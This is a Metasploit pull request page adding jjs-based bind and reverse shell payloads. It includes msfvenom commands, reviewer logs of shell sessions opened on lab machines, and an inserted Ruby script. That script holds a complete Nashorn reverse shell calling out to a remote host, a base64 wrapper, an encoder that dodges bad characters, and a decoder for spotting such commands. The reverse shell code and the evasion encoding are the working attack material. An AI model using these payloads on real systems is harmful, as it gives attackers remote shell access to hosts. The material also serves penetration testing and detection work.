Add bind/reverse jjs unix cmd payloads #12544

Merged
merged 2 commits into from
Nov 20, 2019

Conversation

bcoles (Contributor) commented Nov 6, 2019

Add bind/reverse jjs unix cmd payloads.

The jjs tool is installed with JRE 8 and is installed on plenty of Linux desktop distros by default.

I'm not sure how useful these payloads will be. Most Linux desktop distros will likely have a variety of other useful commands available (at least curl, wget, openssl, and probably perl and python) and probably whitelisted in application firewalls. Likewise, UNIX servers running JRE are likely to also have several viable tools available.

Also, jjs will apparently be deprecated and removed from JDK; however, it's unclear whether jjs will also be removed from JRE.

The generated payloads are also not particularly BadChar friendly, as they contain ' ) ; " | and space characters. Most of these (with the exception of |) could be removed by using echo -e and ${IFS} (nospace encoder), at the expense of portability and introducing \ $ { } as potential BadChar.

It is also worth noting that the payload cmd process will continue to run if the session does not exit cleanly (ctrl+c), rather than cleanly terminating the shell process (exit), leaving a useless open socket.

It's nice to have options. This will get you a shell.

# ./msfvenom -p cmd/unix/reverse_jjs LHOST=172.16.191.165 LPORT=1337
[-] No platform was selected, choosing Msf::Module::Platform::Unix from the payload
[-] No arch selected, selecting arch: cmd from the payload
No encoder or badchars specified, outputting raw payload
Payload size: 863 bytes
echo "eval(new java.lang.String(java.util.Base64.decoder.decode('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')));"|jjs
# ./msfvenom -p cmd/unix/bind_jjs LPORT=1337
[-] No platform was selected, choosing Msf::Module::Platform::Unix from the payload
[-] No arch selected, selecting arch: cmd from the payload
No encoder or badchars specified, outputting raw payload
Payload size: 795 bytes
echo "eval(new java.lang.String(java.util.Base64.decoder.decode('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')));"|jjs

@bcoles bcoles added the payload label Nov 6, 2019
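The comment above describes the wrapper shape (`echo "eval(... Base64.decoder.decode('...'))"|jjs`), lists the bad characters it contains, and sketches an `echo -e` / `${IFS}` variant that trades most of them for `\ $ { }`. The following Ruby is an added example written for this page, not code from the PR or from Metasploit's payload or encoder modules: it builds the same wrapper around a constructed Nashorn script, extracts the script back out of a captured command line (the analyst's side of the same transaction), reports which of the listed characters are present, and shows one concrete reading of the `echo -e` / `${IFS}` idea. The Nashorn body, the `172.16.191.165:1337` endpoint, and all function names are assumptions; the real decoded body is not shown on the page.

```ruby
require 'base64'

# Constructed Nashorn script standing in for the base64 body of the PR's
# payloads (the real decoded body is not shown on the page). It is the usual
# Java-socket reverse shell pattern; the host and port are made up.
NASHORN_SHELL = <<~'JS'
  var s = new java.net.Socket("172.16.191.165", 1337);
  var p = new java.lang.ProcessBuilder("/bin/sh", "-i").redirectErrorStream(true).start();
  var pi = p.getInputStream(), po = p.getOutputStream();
  var si = s.getInputStream(), so = s.getOutputStream();
  while (!s.isClosed()) {
    while (pi.available() > 0) so.write(pi.read());
    while (si.available() > 0) po.write(si.read());
    so.flush(); po.flush();
    try { p.exitValue(); break; } catch (e) {}
    java.lang.Thread.sleep(50);
  }
  p.destroy(); s.close();
JS

# Same wrapper shape as the msfvenom output quoted above: the script is
# base64'd and handed to jjs on stdin through eval().
def jjs_wrapper(js)
  b64 = Base64.strict_encode64(js)
  %Q{echo "eval(new java.lang.String(java.util.Base64.decoder.decode('#{b64}')));"|jjs}
end

# Inverse of jjs_wrapper: recover the script from a captured command line
# (shell history, auditd execve record, EDR process event). Returns nil when
# the command does not have the expected shape or the base64 is malformed.
def unwrap_jjs(cmd)
  m = cmd.match(/decode\('([A-Za-z0-9+\/=]+)'\)/)
  m && Base64.strict_decode64(m[1])
rescue ArgumentError
  nil
end

# The characters the PR author lists as present in the raw payload.
PR_BADCHARS = ["'", ')', ';', '"', '|', ' '].freeze
# The characters the echo -e / ${IFS} variant introduces.
NOSPACE_BADCHARS = ['\\', '$', '{', '}'].freeze

def badchars_present(cmd, chars = PR_BADCHARS)
  chars.select { |c| cmd.include?(c) }
end

# One way to realise the "echo -e and ${IFS}" idea (my reading, not the output
# of Metasploit's nospace encoder): every byte of the script becomes \\xNN
# (double backslash because the word is unquoted, so the shell reduces it to
# \xNN before echo sees it) and ${IFS} replaces the spaces between words.
# Only '|' survives from the original set, at the cost of '\', '$', '{', '}'
# and of needing an echo that understands -e and \x (bash, not dash's sh).
def hex_echo_nospace(js)
  hex = js.bytes.map { |b| format('\\\\x%02x', b) }.join
  "echo${IFS}-e${IFS}#{hex}|jjs"
end

if $PROGRAM_NAME == __FILE__
  raw = jjs_wrapper(NASHORN_SHELL)
  puts raw
  puts "badchars in raw wrapper:      #{badchars_present(raw).inspect}"
  alt = hex_echo_nospace(NASHORN_SHELL)
  puts "badchars left after encoding: #{badchars_present(alt).inspect}"
  puts "badchars newly introduced:    #{badchars_present(alt, NOSPACE_BADCHARS).inspect}"
  puts "round trip ok: #{unwrap_jjs(raw) == NASHORN_SHELL}"
end
```

`unwrap_jjs` is the piece worth keeping on the defensive side: a process event whose command line matches `decode('...')` piped into `jjs` is a strong signal on its own, and decoding the argument tells you immediately what the script connects to. The `hex_echo_nospace` output is deliberately not run here; it is there to make the character-set trade-off in the comment above concrete, and it inherits the portability caveat the comment already notes.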
bwatters-r7 (Contributor) commented
Bind

[ruby-2.6.5@metasploit-framework](land-12544) tmoose@ubuntu:~/rapid7/metasploit-framework$ ./msfvenom -p cmd/unix/bind_jjs LPORT=4567
[-] No platform was selected, choosing Msf::Module::Platform::Unix from the payload
[-] No arch selected, selecting arch: cmd from the payload
No encoder or badchars specified, outputting raw payload
Payload size: 795 bytes
echo "eval(new java.lang.String(java.util.Base64.decoder.decode('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')));"|jjs
msf5 exploit(multi/handler) > set payload cmd/unix/bind_jjs
payload => cmd/unix/bind_jjs
msf5 exploit(multi/handler) > set rhost 192.168.134.163
rhost => 192.168.134.163
msf5 exploit(multi/handler) > set lport 4567
lport => 4567
msf5 exploit(multi/handler) > run

[*] Started bind TCP handler against 192.168.134.163:4567
[*] Command shell session 1 opened (192.168.236.129:46701 -> 192.168.134.163:4567) at 2019-11-20 14:00:43 -0600

whoami
msfuser
ifconfig
ens32: flags=4163<UP,BROADCAST,RUNNING,MULTICAST>  mtu 1500
        inet 192.168.134.163  netmask 255.255.255.0  broadcast 192.168.134.255
        inet6 fd34:fe56:7891:2f3b:d34b:63b2:8d3b:ac60  prefixlen 64  scopeid 0x0<global>
        inet6 fd34:fe56:7891:2f3b:a453:31ed:5597:266  prefixlen 64  scopeid 0x0<global>
        inet6 fe80::9897:ff98:fb10:3fbc  prefixlen 64  scopeid 0x20<link>
        ether 00:0c:29:03:93:5e  txqueuelen 1000  (Ethernet)
        RX packets 153450  bytes 230366230 (230.3 MB)
        RX errors 0  dropped 0  overruns 0  frame 0
        TX packets 66739  bytes 4541920 (4.5 MB)
        TX errors 0  dropped 0 overruns 0  carrier 0  collisions 0

lo: flags=73<UP,LOOPBACK,RUNNING>  mtu 65536
        inet 127.0.0.1  netmask 255.0.0.0
        inet6 ::1  prefixlen 128  scopeid 0x10<host>
        loop  txqueuelen 1000  (Local Loopback)
        RX packets 352  bytes 31380 (31.3 KB)
        RX errors 0  dropped 0  overruns 0  frame 0
        TX packets 352  bytes 31380 (31.3 KB)
        TX errors 0  dropped 0 overruns 0  carrier 0  collisions 0

uname -a
Linux ubuntu64-1804 4.15.0-50-generic #54-Ubuntu SMP Mon May 6 18:46:08 UTC 2019 x86_64 x86_64 x86_64 GNU/Linux

Reverse

[ruby-2.6.5@metasploit-framework](land-12544) tmoose@ubuntu:~/rapid7/metasploit-framework$ ./msfvenom -p cmd/unix/reverse_jjs LHOST=192.168.135.168 LPORT=4567
[-] No platform was selected, choosing Msf::Module::Platform::Unix from the payload
[-] No arch selected, selecting arch: cmd from the payload
No encoder or badchars specified, outputting raw payload
Payload size: 863 bytes
echo "eval(new java.lang.String(java.util.Base64.decoder.decode('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')));"|jjs
msf5 exploit(multi/handler) > set payload cmd/unix/reverse_jjs
payload => cmd/unix/reverse_jjs
msf5 exploit(multi/handler) > set lhost 192.168.135.168
lhost => 192.168.135.168
msf5 exploit(multi/handler) > set lport 4567
lport => 4567
msf5 exploit(multi/handler) > run

[*] Started reverse TCP handler on 192.168.135.168:4567 
[*] Command shell session 2 opened (192.168.135.168:4567 -> 192.168.135.186:57608) at 2019-11-20 14:06:55 -0600

ifconfig
ens32: flags=4163<UP,BROADCAST,RUNNING,MULTICAST>  mtu 1500
        inet 192.168.135.186  netmask 255.255.255.0  broadcast 192.168.135.255
        inet6 fd34:fe56:7891:2f3a:a453:31ed:5597:266  prefixlen 64  scopeid 0x0<global>
        inet6 fe80::9897:ff98:fb10:3fbc  prefixlen 64  scopeid 0x20<link>
        inet6 fd34:fe56:7891:2f3a:a53b:44a4:bdb1:4f2  prefixlen 64  scopeid 0x0<global>
        ether 00:0c:29:03:93:5e  txqueuelen 1000  (Ethernet)
        RX packets 153553  bytes 230380339 (230.3 MB)
        RX errors 0  dropped 0  overruns 0  frame 0
        TX packets 67004  bytes 4573454 (4.5 MB)
        TX errors 0  dropped 0 overruns 0  carrier 0  collisions 0

lo: flags=73<UP,LOOPBACK,RUNNING>  mtu 65536
        inet 127.0.0.1  netmask 255.0.0.0
        inet6 ::1  prefixlen 128  scopeid 0x10<host>
        loop  txqueuelen 1000  (Local Loopback)
        RX packets 466  bytes 41595 (41.5 KB)
        RX errors 0  dropped 0  overruns 0  frame 0
        TX packets 466  bytes 41595 (41.5 KB)
        TX errors 0  dropped 0 overruns 0  carrier 0  collisions 0

whoami
msfuser
uname -a
Linux ubuntu64-1804 4.15.0-50-generic #54-Ubuntu SMP Mon May 6 18:46:08 UTC 2019 x86_64 x86_64 x86_64 GNU/Linux
^C

@bwatters-r7 bwatters-r7 self-assigned this Nov 20, 2019
bwatters-r7 added a commit that referenced this pull request Nov 20, 2019
Merge branch 'land-12544' into upstream-master
@bwatters-r7 bwatters-r7 merged commit 706bb89 into rapid7:master Nov 20, 2019
bwatters-r7 (Contributor) commented Nov 20, 2019

Release Notes

Reverse and bind payloads for the jjs tool installed with the JDK have been added.

msjenkins-r7 pushed a commit that referenced this pull request Nov 20, 2019
Merge branch 'land-12544' into upstream-master
@bcoles bcoles deleted the jjs_payloads branch November 20, 2019 20:43
@tdoan-r7 tdoan-r7 added the rn-enhancement release notes enhancement label Dec 11, 2019